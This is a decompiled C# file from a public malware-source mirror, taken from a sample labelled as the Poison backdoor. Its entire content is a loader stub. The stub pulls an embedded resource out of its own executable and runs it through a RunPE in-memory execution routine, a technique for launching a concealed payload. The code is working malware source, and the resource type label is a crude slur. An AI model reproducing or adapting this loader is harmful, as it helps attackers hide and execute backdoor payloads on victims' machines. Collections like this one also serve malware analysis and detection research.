mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-31 22:37:27 +00:00
43 lines
1.8 KiB
C#
43 lines
1.8 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Cursor.Module1
|
|
// Assembly: Cursor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: B3356960-2D13-4E8B-9A22-3EBE56F6B0CE
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.Win32.Poison.aec-2b0740b68917a42d6ada501b21334e0148d2019f46109d3bfe3a1b17ed23caa8.exe
|
|
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.Runtime.InteropServices;
|
|
|
|
namespace Cursor
|
|
{
|
|
[StandardModule]
|
|
internal sealed class Module1
|
|
{
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
|
|
|
|
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
private static extern int SizeofResource(IntPtr hModule, IntPtr hResInfo);
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
private static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
|
|
|
|
[STAThread]
|
|
public static void Main()
|
|
{
|
|
string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
|
|
IntPtr moduleHandle = Module1.GetModuleHandle(ref moduleName);
|
|
IntPtr resource = Module1.FindResource(moduleHandle, "69", "GAY");
|
|
IntPtr source = Module1.LoadResource(moduleHandle, resource);
|
|
int length = Module1.SizeofResource(moduleHandle, resource);
|
|
byte[] numArray = new byte[checked (length - 1 + 1)];
|
|
Marshal.Copy(source, numArray, 0, length);
|
|
x86.RunPE(numArray, Process.GetCurrentProcess().MainModule.FileName);
|
|
}
|
|
}
|
|
}
|